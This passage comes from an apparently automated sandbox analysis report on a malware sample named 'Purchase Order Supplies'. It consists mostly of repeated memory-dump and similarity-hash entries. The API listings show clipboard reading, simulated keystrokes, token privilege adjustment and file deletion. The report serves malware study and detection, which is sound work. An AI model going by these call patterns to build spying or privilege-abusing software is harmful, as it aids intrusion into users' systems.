                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: _memmove
                          • String ID:
                          • API String ID: 4104443479-0
                          • Opcode ID: 653a53b8435a0736043d6b22074b13ebbbade5d52c540747a625e5d2bf85aa42
                          • Instruction ID: 36fcdef085ad5591e9dcde2cc1f540579e89fe466d39d4580795e18ac330fdef
                          • Opcode Fuzzy Hash: 653a53b8435a0736043d6b22074b13ebbbade5d52c540747a625e5d2bf85aa42
                          • Instruction Fuzzy Hash: DE41D079200602EFCB14DF5AE584A62F3E4FF88360714C56EE89A87751D730EC52DB20
                          APIs
                          • SetFilePointerEx.KERNEL32(?,?,00000001,00000000,00000000,?,?,00000000), ref: 00C94F8F
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: FilePointer
                          • String ID:
                          • API String ID: 973152223-0
                          • Opcode ID: 87acce4fd8400229500a501997f0da2d3e8734ac93671835b22480425996b66c
                          • Instruction ID: 10e330f06ae7cbbd98f77868abe1708b0c149c67352ad86c79b901be801a56b3
                          • Opcode Fuzzy Hash: 87acce4fd8400229500a501997f0da2d3e8734ac93671835b22480425996b66c
                          • Instruction Fuzzy Hash: 76313B71A00616AFCF08CFADD488AADB7B5BF48310F148629E81997754D770BA91CB90
                          APIs
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: select
                          • String ID:
                          • API String ID: 1274211008-0
                          APIs
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: ClearVariant
                          • String ID:
                          • API String ID: 1473721057-0
                          APIs
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: _memmove
                          • String ID:
                          • API String ID: 4104443479-0
                          APIs
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: _memmove
                          • String ID:
                          • API String ID: 4104443479-0
                          APIs
                            • Part of subcall function 00C93F5D: FreeLibrary.KERNEL32(00000000,?), ref: 00C93F90
                          • LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,00C934E2,?,00000001), ref: 00C93FCD
                            • Part of subcall function 00C93E78: FreeLibrary.KERNEL32(00000000), ref: 00C93EAB
                            • Part of subcall function 00C94010: _memmove.LIBCMT ref: 00C9405A
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: Library$Free$Load_memmove
                          • String ID:
                          • API String ID: 3640140200-0
                          APIs
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: ClearVariant
                          • String ID:
                          • API String ID: 1473721057-0
                          APIs
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: LibraryLoad
                          • String ID:
                          • API String ID: 1029625771-0
                          APIs
                          • ReadFile.KERNEL32(?,?,00010000,?,00000000,?,00000000,00000000,?,00C94E69,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00C94CF7
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: FileRead
                          • String ID:
                          • API String ID: 2738559852-0
                          APIs
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: _memmove
                          • String ID:
                          • API String ID: 4104443479-0
                          APIs
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: _memmove
                          • String ID:
                          • API String ID: 4104443479-0
                          APIs
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: _memmove
                          • String ID:
                          • API String ID: 4104443479-0
                          APIs
                          • WSAStartup.WS2_32(00000202,?), ref: 00CE95C9
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: Startup
                          • String ID:
                          • API String ID: 724789610-0
                          APIs
                          • FreeLibrary.KERNEL32(?,?,?,?,?,00C934E2,?,00000001), ref: 00C93E6D
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: FreeLibrary
                          • String ID:
                          • API String ID: 3664257935-0
                          APIs
                          • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 00CD7A11
                            • Part of subcall function 00C97E53: _memmove.LIBCMT ref: 00C97EB9
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: FolderPath_memmove
                          • String ID:
                          • API String ID: 3334745507-0
                          APIs
                            • Part of subcall function 00CD6623: SetFilePointerEx.KERNEL32(?,?,?,00000000,00000001,00000003,?,00CD685E,?,?,?,00D04A5C,00D2E448,00000003,?,?), ref: 00CD66E2
                          • WriteFile.KERNEL32(?,?,00D522E8,00000000,00000000,?,?,?,00D04A5C,00D2E448,00000003,?,?,00C94C44,?,?), ref: 00CD686C
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: File$PointerWrite
                          • String ID:
                          • API String ID: 539440098-0
                          APIs
                          • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00C91952
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: MessageSendTimeout
                          • String ID:
                          • API String ID: 1599653421-0
                          APIs
                            • Part of subcall function 00C9193B: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00C91952
                          • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00CCE3AA
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: MessageSend$Timeout
                          • String ID:
                          • API String ID: 1777923405-0
                          APIs
                          Similarity
                          • API ID: TextWindow
                          • String ID:
                          • API String ID: 530164218-0
                          APIs
                          • SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?,?,?,00D049DA,?,?,00000000), ref: 00C94FC4
                          Similarity
                          • API ID: FilePointer
                          • String ID:
                          • API String ID: 973152223-0
                          APIs
                          Similarity
                          • API ID: ClearVariant
                          • String ID:
                          • API String ID: 1473721057-0
                          APIs
                          • CloseHandle.KERNEL32(?,?,?,00C950BE,?,00C95088,?,00C9BE3D,00D522E8,?,00000000,?,00C93E2E,?,00000000,?), ref: 00C9510C
                          Similarity
                          • API ID: CloseHandle
                          • String ID:
                          • API String ID: 2962429428-0
                          APIs
                            • Part of subcall function 00CAAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00CAAF8E
                          • NtdllDialogWndProc_W.NTDLL(?,0000004E,?,?,?,?,?,?,?), ref: 00CFF64E
                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00CFF6AD
                          • GetWindowLongW.USER32(?,000000F0), ref: 00CFF6EA
                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00CFF711
                          • SendMessageW.USER32 ref: 00CFF737
                          • _wcsncpy.LIBCMT ref: 00CFF7A3
                          • GetKeyState.USER32(00000011), ref: 00CFF7C4
                          • GetKeyState.USER32(00000009), ref: 00CFF7D1
                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00CFF7E7
                          • GetKeyState.USER32(00000010), ref: 00CFF7F1
                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00CFF820
                          • SendMessageW.USER32 ref: 00CFF843
                          • SendMessageW.USER32(?,00001030,?,00CFDE69), ref: 00CFF940
                          • SetCapture.USER32(?), ref: 00CFF970
                          • ClientToScreen.USER32(?,?), ref: 00CFF9D4
                          • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 00CFF9FA
                          • ReleaseCapture.USER32 ref: 00CFFA05
                          • GetCursorPos.USER32(?), ref: 00CFFA3A
                          • ScreenToClient.USER32(?,?), ref: 00CFFA47
                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 00CFFAA9
                          • SendMessageW.USER32 ref: 00CFFAD3
                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00CFFB12
                          • SendMessageW.USER32 ref: 00CFFB3D
                          • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00CFFB55
                          • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00CFFB60
                          • GetCursorPos.USER32(?), ref: 00CFFB81
                          • ScreenToClient.USER32(?,?), ref: 00CFFB8E
                          • GetParent.USER32(?), ref: 00CFFBAA
                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 00CFFC10
                          • SendMessageW.USER32 ref: 00CFFC40
                          • ClientToScreen.USER32(?,?), ref: 00CFFC96
                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00CFFCC2
                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00CFFCEA
                          • SendMessageW.USER32 ref: 00CFFD0D
                          • ClientToScreen.USER32(?,?), ref: 00CFFD57
                          • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00CFFD87
                          • GetWindowLongW.USER32(?,000000F0), ref: 00CFFE1C
                          Strings
                          Similarity
                          • API ID: MessageSend$ClientScreen$LongStateWindow$CaptureCursorMenuPopupTrack$DialogInvalidateNtdllParentProc_RectRelease_wcsncpy
                          • String ID: @GUI_DRAGID$F
                          • API String ID: 3461372671-4164748364
                          APIs
                          • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00CFAFDB
                          Strings
                          Similarity
                          • API ID: MessageSend
                          • String ID: %d/%02d/%02d
                          • API String ID: 3850602802-328681919
                          APIs
                          • GetForegroundWindow.USER32(00000000,00000000), ref: 00CAF796
                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00D04388
                          • IsIconic.USER32(000000FF), ref: 00D04391
                          • ShowWindow.USER32(000000FF,00000009), ref: 00D0439E
                          • SetForegroundWindow.USER32(000000FF), ref: 00D043A8
                          • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00D043BE
                          • GetCurrentThreadId.KERNEL32 ref: 00D043C5
                          • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 00D043D1
                          • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00D043E2
                          • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00D043EA
                          • AttachThreadInput.USER32(00000000,?,00000001), ref: 00D043F2
                          • SetForegroundWindow.USER32(000000FF), ref: 00D043F5
                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00D0440A
                          • keybd_event.USER32(00000012,00000000), ref: 00D04415
                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00D0441F
                          • keybd_event.USER32(00000012,00000000), ref: 00D04424
                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00D0442D
                          • keybd_event.USER32(00000012,00000000), ref: 00D04432
                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00D0443C
                          • keybd_event.USER32(00000012,00000000), ref: 00D04441
                          • SetForegroundWindow.USER32(000000FF), ref: 00D04444
                          • AttachThreadInput.USER32(000000FF,?,00000000), ref: 00D0446B
                          Strings
                          Similarity
                          • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                          • String ID: Shell_TrayWnd
                          • API String ID: 4125248594-2988720461
                          APIs
                            • Part of subcall function 00C931B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 00C931DA
                            • Part of subcall function 00CD7B9F: __wsplitpath.LIBCMT ref: 00CD7BBC
                            • Part of subcall function 00CD7B9F: __wsplitpath.LIBCMT ref: 00CD7BCF
                            • Part of subcall function 00CD7C0C: GetFileAttributesW.KERNEL32(?,00CD6A7B), ref: 00CD7C0D
                          • _wcscat.LIBCMT ref: 00CD6B9D
                          • _wcscat.LIBCMT ref: 00CD6BBB
                          • __wsplitpath.LIBCMT ref: 00CD6BE2
                          • FindFirstFileW.KERNEL32(?,?), ref: 00CD6BF8
                          • _wcscpy.LIBCMT ref: 00CD6C57
                          • _wcscat.LIBCMT ref: 00CD6C6A
                          • _wcscat.LIBCMT ref: 00CD6C7D
                          • lstrcmpiW.KERNEL32(?,?), ref: 00CD6CAB
                          • DeleteFileW.KERNEL32(?), ref: 00CD6CBC
                          • MoveFileW.KERNEL32(?,?), ref: 00CD6CDB
                          • MoveFileW.KERNEL32(?,?), ref: 00CD6CEA
                          • CopyFileW.KERNEL32(?,?,00000000), ref: 00CD6CFF
                          • DeleteFileW.KERNEL32(?), ref: 00CD6D10
                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00CD6D37
                          • FindClose.KERNEL32(00000000), ref: 00CD6D53
                          • FindClose.KERNEL32(00000000), ref: 00CD6D61
                          Strings
                          Similarity
                          • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteMove$AttributesCopyFirstFullNameNextPath_wcscpylstrcmpi
                          • String ID: \*.*
                          • API String ID: 1867810238-1173974218
                          APIs
                          • OpenClipboard.USER32(00D2DBF0), ref: 00CE70C3
                          • IsClipboardFormatAvailable.USER32(0000000D), ref: 00CE70D1
                          • GetClipboardData.USER32(0000000D), ref: 00CE70D9
                          • CloseClipboard.USER32 ref: 00CE70E5
                          • GlobalLock.KERNEL32(00000000), ref: 00CE7101
                          • CloseClipboard.USER32 ref: 00CE710B
                          • GlobalUnlock.KERNEL32(00000000), ref: 00CE7120
                          • IsClipboardFormatAvailable.USER32(00000001), ref: 00CE712D
                          • GetClipboardData.USER32(00000001), ref: 00CE7135
                          • GlobalLock.KERNEL32(00000000), ref: 00CE7142
                          • GlobalUnlock.KERNEL32(00000000), ref: 00CE7176
                          • CloseClipboard.USER32 ref: 00CE7283
                          Similarity
                          • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                          • String ID:
                          • API String ID: 3222323430-0
                          APIs
                            • Part of subcall function 00CCBEC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00CCBF0F
                            • Part of subcall function 00CCBEC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00CCBF3C
                            • Part of subcall function 00CCBEC3: GetLastError.KERNEL32 ref: 00CCBF49
                          • _memset.LIBCMT ref: 00CCBA34
                          • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00CCBA86
                          • CloseHandle.KERNEL32(?), ref: 00CCBA97
                          • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00CCBAAE
                          • GetProcessWindowStation.USER32 ref: 00CCBAC7
                          • SetProcessWindowStation.USER32(00000000), ref: 00CCBAD1
                          • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00CCBAEB
                            • Part of subcall function 00CCB8B0: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00CCB9EC), ref: 00CCB8C5
                            • Part of subcall function 00CCB8B0: CloseHandle.KERNEL32(?,?,00CCB9EC), ref: 00CCB8D7
                          Strings
                          Similarity
